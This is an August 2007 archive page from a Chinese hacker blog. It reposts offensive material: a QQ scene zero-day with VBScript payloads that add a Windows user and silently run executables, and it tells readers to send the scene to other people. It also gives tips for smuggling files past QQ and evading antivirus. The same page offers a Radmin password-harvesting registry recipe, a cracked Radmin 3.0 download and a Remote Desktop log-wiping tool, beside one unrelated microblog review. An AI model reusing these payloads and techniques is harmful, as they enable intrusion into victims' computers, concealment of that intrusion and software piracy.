2007年8月 的日志

动易2006_SP6最新漏洞得到管理员密码

鬼仔注:从7j那里看到的,并且有7j写的接收页面。

7j:没有找到他说的接收页面,只有自已用PHP写个了
阅读全文 »

Tags: ,

爱唠叨-你在做什么


  爱唠叨 — 又一个twitter类的站点,微型博客。
  最近这段时间里看到我这里订阅的feed中,接这个话题广告的人,对于 爱唠叨 的批评比较多。
  来看下 爱唠叨 的介绍:

  “爱唠叨(www.ilaodao.cn)”是多种形式发布-即时更新,您可以通过msn、QQ(等im工具) 、网站、邮箱、手机短信和博客等形式上传唠叨。

  随时随地关注-通过手机、网站、msn、邮箱、rss订阅、博客等方式查看朋友在做什么,了解朋友的一举一动。

  注:在自己的博客或空间中加入爱唠叨提供的代码,用户(通过以上方式)随时更新,即可让其他人在这里看见写短信发送唠叨、通过自己的邮箱写唠叨
  加入msn、QQ机器人,则可以用msn/QQ上传唠叨,可以让你的朋友看到。
  登陆手机wap网站,可以查看和爱唠叨网站的同步内容
  通过rss软件定制朋友的唠叨。
  邀请朋友使用-用户可以向朋友发送邀请,利用朋友关系进行口碑传播

  目前,“爱唠叨”推出了新闻、财经以及体育三大机器人,用户可以及时的收到各类要闻。要想取得这项功能也非常的简单,只要“爱唠叨”的注册用户开启了即时IM通知功能,并花几秒张把这三大机器人加为好友,它们就将为你提供实时、有用的信息并发到你的QQ、MSN等接收载体上,让你方便、快捷的获取最新发生的大事。

  看下 爱唠叨 的界面:

  有没有感觉链接的蓝色很扎眼?反正我是感觉这样,而且配色我看着不舒服,应该说是背景色看着不舒服。
  还有就是字体的大小,用户名链接部分的字体,因为小的关系,跟正文部分明显错开了。不协调。
  scavin因为名字中含有av这两个字母,结果连用户名都被过滤了,的确是比较郁闷,这样还能用的开心吗?
  fisker说 爱唠叨 的logo很象飞信。
  为什么url中要有个u?比如我的 http://www.ilaodao.cn/u/sunlei 。

  目前我所知道的国内模仿twitter的站点有:饭否,叽歪的,还有我们的主角– 爱唠叨 ,这两点腾讯也来凑热闹,发布了滔滔。我个人对于这种twitter类的服务没什么兴趣,因此我也很少玩,虽然在这几个站上我都有帐号,但是发布的消息却都是都只有几条。我并不热衷于这种服务,玩不好。

  说点题外话,很久没接到过feedsky的话题广告了,昨天看到feedsky推出了页面展示广告,但是我没有获得内侧资格,我一直都挺期待这样的服务,因为对于我的情况很适合。记得很久以前在Src在他blog透漏过这个消息。

Tags: ,

X-Spoof

鬼仔注:X-Spoof前段时间很火,据说还可以卖钱,现在有人放出来了。我也转过来。不过刚才 百度 了一下,发现前几天就有人提供下载了。不知道X-Spoof是什么的朋友, Google 一下吧。

来源:小浩's Blog

下载地址:X-Spoof.rar

X-Spoof v1.3.3说明:
阅读全文 »

Tags:

小谈RADMIN

转载请保留版权信息!谢谢合作!
by NetPatch
welcome www.nspcn.org and www.icehack.com

最近做渗透测试时常碰到RADMIN一类的东西..
一碰到此类的程序,一般我都会先看下对方把RADMIN的端口配置成什么..以及相应的PASS(加密过的)
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter //默认密码注册表位置
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
//把海阳读出来的,用逗号格开,然后用下面的代码转换就可以了

阅读全文 »

Tags:

Radmin 3.0 Remote Control 英文破解版

鬼仔注:刚才在冰点看到这个,大家现在用的radmin最多的版本应该2.1、2.2,3.0的用的最多的应该是当初影子汉化的那个,几年前的了,但是我记得当初影子说那个并不算是真正的3.0,后来影子好像也消失了。官方的3.0一直没有破解,前段时间我在国外坛子上下了一个据说是破解的,但是下来之后才知道压缩包加密了,而且没有公布密码,现在这里有个破解的,希望对大家有用。我很喜欢radmin,特别是他的屏幕传输速度,反正我是没有见过相同情况下比radmin的屏幕传输速度更快的远控软件(终端除外,终端应该不算远控软件)。

转自:http://blog.chinaunix.net/u/21012/showart_351063.html

服务端3.0.0.5:
http://www.2baksa.net/news/15204/ (服务程序+破解补丁)
阅读全文 »

Tags:

FLASH也能扫描

鬼仔注:演示页面中有源码。

来源:茄子乱语(s0n9's Blog)

利用ActionScript 3的套接字类和脚本事件,FLASH也能变成一个扫描器,恐怖咯~小心媒体文件.

老外放了一个POC,资料很详细.

http://scan.flashsec.org/

Tags:

QQ 0day

update(2007.8.14 22:00):在雕牌那里看到了点相关资料,更新下。补充在下面。

鬼仔注:我这里测试有的成功,有的不成功,原因不明。同样的版本的情况下,有的成功,有的失败。比如同样的beta1,有的失败,有的成功,beta4也有的失败,有的成功。当然,VBScript.qqs中的脚本可以自己修改,达到别的目的。利用场景。懒得贴图了,自己测试吧。

来源:Crab's Blog

把那3个文件解到\Tencent\QQ\IMScene\Scene\

用记事本打开VBScript.qqs
最下边 有那个代码了
然后在场景中发给别人

下载:qq.rar

相关资料(来源:雕牌's blog)
关于那QQ 0day 一点资料,现在把具体过程写出来,大家看看吧,也许有人能突破。我在blog上早就说明了,我不装B,这个QQ的测试,我从没拿外面的人测试,你们说,我算是装B么。再说了,我blog写这个的时候就说过,还在测试中,从没说已经成功利用,一直卡在执行文件那一步。
测试过程:
一开始和教主测试的时候是因为ms的播放器能够播放swf文件。这个我在上个月就写过文章了,当初是测试QQ场景的播放器,但是发现无法触发这个漏洞,因为这个播放器不是使用的MS播放的。所以后来教主貌似去测试别的东西了,我呢,继续测这个QQ,前几天测试的时候做了几个包,有弹框框的包,有传exe的包,有使对放QQ崩溃的包。这个QQ的漏洞想必大家应该都清楚了。我还是简单说说。
问题文件确实是在QQ场景里面,场景里面有一个图片文件和VBScript.qqs,Config.qqs,文件。每个文件的具体作用简单说说,那个图片文件不用说了,就是场景的背景。Config.qqs文件的内容是:

<?xml version="1.0" encoding="gb2312"?><theme ver="1" GUID="8B7A99E866CC454DBE2A7F6238EE8F20">
<Scene Type="1" BackGroupColor="#FFFFFF" FriendCaptionColor="#0000FF" MineCaptionColor="#000000" MsgTextColor="#000000" SystemRequestColor="#000000" SystemResultColor="#000000">
<Normal>
<SOUND Loop="true" SourcePath="E000001.mp3"/>
</Normal>
<Action name="动作01" type="1">
<ActionData>
<SOUND UseNormalSound="false" Loop="true" SourcePath="E000001.mp3"/>
</ActionData>
</Action>
</Scene>
</theme>

一目了然。VBScript.qqs这个文件的作用是一段些'动画参数,初始化帧动画参数,初始化背景图片位置,场景窗口大小改变的时候重新布置场景等等事件的脚本。看文件名字就知道是VBS脚本。
但是这个VBS脚本不是用winds下的vbs.dll解析的,而是用的QQ自己目录下的一个vbs*.dll文件解析的。VBS能做什么,大家比我再清楚不过了,VBS下载者,执行,病毒。功能强大。加用户什么的都是轻而易举。这里给几个VBS脚本出来,大家如果对这个漏洞还有兴趣,可以自己去测试测试,
add user:

dim objshell
set objshell = wscript.createOBject("wscript.shell")
iReturn = objshell.Run("net user x x /add",0,TRUE)

run dos exe:

dim ws
Set ws = WScript.CreateObject("WScript.Shell")
iReturn = ws.Run("test.exe",0,TRUE)

run gui exe:

dim wsh
dim Js1
Js1 ="t1est.exe"
set wsh=WScript.CreateObject("WScript.Shell")
wsh.Run(Js1)

还有如果用VBS下载着记得免杀,因为测试的时候被杀,所以后来才去研究传任意文件。那么如何传任意文件,下面介绍的这个方法在我们测试期间都成功过,但是今天测试的时候貌似不成功。方法写出来。
这个方法也是在研究swf的时候发现的,因为制作场景不支持添加swf文件。后来就想办法。先制作QQ安装包,里面添加音乐。那音乐就是swf改后缀的文件。添加后再生成包。再用UE或者别的16进制编辑的。查找里面mp3后缀,改掉就成了。这个地方也许还有研究,就是他生成的文件为什么一定在QQ的 IMScene\Scene\这个目录呢,如果在这里就能改变他的路径,直接写到启动里面不就OK了,关于这个我没测试成功,还等待各位牛人发现。再次申明这个传任意文件的这个漏洞貌似TX已经封了,不是很清楚,也许今天测试掉了步骤。关于这个漏洞大家有什么看法,或者新的想法,可以跟帖,欢迎一起测试。

Tags:

3389登录日志清除软件

软件作者:pt007[at]vip.sina.com版权所有,转载请注明版权
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
阅读全文 »

Tags: ,